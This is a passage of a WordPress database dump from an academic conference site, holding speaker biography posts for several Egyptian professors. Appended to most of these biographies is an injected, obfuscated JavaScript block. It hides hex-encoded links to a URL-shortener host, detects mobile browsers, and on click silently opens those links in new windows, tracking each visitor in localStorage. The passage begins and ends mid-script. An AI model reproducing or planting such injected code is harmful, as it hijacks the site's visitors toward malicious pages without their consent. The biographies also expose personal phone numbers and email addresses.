Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Prof. Aliaa A. A. Youssif','','publish','closed','closed','','prof-aliaa-a-a-youssif','','','2023-06-03 12:07:54','2023-06-03 12:07:54','',0,'https://gsw2023.com/?post_type=dt_team&#038;p=4629',0,'dt_team','',0),
(4630,1,'2023-06-03 11:58:02','2023-06-03 11:58:02','','Aliaa Bio 2','','inherit','open','closed','','aliaa-bio-2','','','2023-06-03 11:58:02','2023-06-03 11:58:02','',4629,'https://gsw2023.com/wp-content/uploads/2023/06/Aliaa-Bio-2.jpg',0,'attachment','image/jpeg',0),
(4631,1,'2023-06-03 12:03:04','2023-06-03 12:03:04','<!-- wp:paragraph -->\n<p>Associate Professor; Senior Regional GIS, Remote Sensing and Hazards Assessment Expert;<br>he is working at Arab Academy for Science, Technology and Maritime Transport (AASTMT),<br>Cairo – Egypt as a director of the “Remote Sensing &amp; Spatial Studies Unit” – College of<br>Engineering and Technology, Heliopolis, AASTMT-Cairo Campus.<br>He had graduated from the University of El-Mansoura, Faculty of Science, Geology Department,<br>Egypt where he also obtained the MSc. and Ph.D. degrees in Environmental Geology and Natural<br>Hazards Assessment using the Remote Sensing and GIS techniques.<br>He had worked for many distinctive institutions like, The World Bank, The United Nations Office for<br>Disaster Risk Reduction (UNDRR) - Regional Office for Arab States; Center of Environment and<br>Development for the Arab Region and Europe (CEDARE); National Authority for Remote Sensing and<br>Spaces Sciences (NARSS); Egyptian Environment Affairs Agency (EEAA).<br>He has conducted many of GIS &amp; RS and hazards/disaster assessment and DRR training programs in<br>different applications at many conferences, workshops, and symposiums for national and regional agents,<br>in addition to academic courses for under- and post-graduates with MSc degrees’ supervision. He also<br>published many scientific research articles in the specialized fields using the up-to-date remote sensing and<br>GIS techniques in different hazards fields.<br>The overall remote sensing, GIS experience extended over the last 28 years in both business and academic<br>and scientific fields.<br>Cell phones: 0122 8700124; 01280258888<br>aliamasha@gmail.com; ali.amasha@aast.edu</p>\n<!-- /wp:paragraph -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Ali Amasha, Ph.D.','','publish','closed','closed','','ali-amasha-ph-d','','','2023-06-03 12:03:08','2023-06-03 12:03:08','',0,'https://gsw2023.com/?post_type=dt_team&#038;p=4631',0,'dt_team','',0),
(4632,1,'2023-06-03 12:02:46','2023-06-03 12:02:46','','Ali Amasha Biography_n41','','inherit','open','closed','','ali-amasha-biography_n41','','','2023-06-03 12:02:46','2023-06-03 12:02:46','',4631,'https://gsw2023.com/wp-content/uploads/2023/06/Ali-Amasha-Biography_n41.jpg',0,'attachment','image/jpeg',0),
(4633,1,'2023-06-03 12:06:20','2023-06-03 12:06:20','<!-- wp:heading {\"level\":1} -->\n<h1 class=\"wp-block-heading\">Prof. Dr. KHALED LOTFY ALI AL-AZAB</h1>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p><strong>Featured scientist in top 2% scientist list by Stanford University</strong><strong></strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:table -->\n<figure class=\"wp-block-table\"><table><tbody><tr><td><strong>Full Professor at Department&nbsp; of&nbsp; Mathematics,&nbsp; Faculty&nbsp; of&nbsp; Science, Zagazig&nbsp;&nbsp; University, P.O. Box 44519, Zagazig, EGYPT. </strong><strong>Editor of Journal of Engineering and Thermal Sciences.</strong> <strong>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Guest Editor of </strong><a href=\"https://www.mdpi.com/journal/crystals/editors\" target=\"_blank\" rel=\"noreferrer noopener\"><strong>Crystals</strong></a><strong> journal (<a href=\"https://www.mdpi.com/journal/crystals/special_issues/YC743QR65Z\" target=\"_blank\" rel=\"noreferrer noopener\">Research in 2D &nbsp;&nbsp;</a></strong> <strong><a href=\"https://www.mdpi.com/journal/crystals/special_issues/YC743QR65Z\" target=\"_blank\" rel=\"noreferrer noopener\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Semiconductor Materials</a>)</strong> <strong>&nbsp;</strong> <strong>&nbsp;</strong> &nbsp;</td><td>&nbsp;</td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:paragraph -->\n<p>Recipient of the State Award for Bodies and Individuals in Basic Sciences (Muhammad Amin Lotfy) in Mathematical and Physical Sciences (Mathematical Sciences) from Academy of Scientific Research and Technology (Egypt) 2019.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Recipient of the State Award for Bodies and Individuals in Basic Sciences (Attia Ashour) in Mathematics (Mathematical Sciences) from Academy of Scientific Research and Technology (Egypt) 2020.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Kh. Lofty: he received the PhD degree in applied Mathematics from Faculty of Science, Zagazig University, Egypt. His research interests are in the areas of applied mathematics and mathematical physics, Thermoelasticity, photothermal, Mechanical Engineering, Solid Mechanics, Applied and Computational Mathematics. He has published research articles in reputed international journals of mathematical and engineering sciences (he published about 170 papers)</p>\n<!-- /wp:paragraph -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const 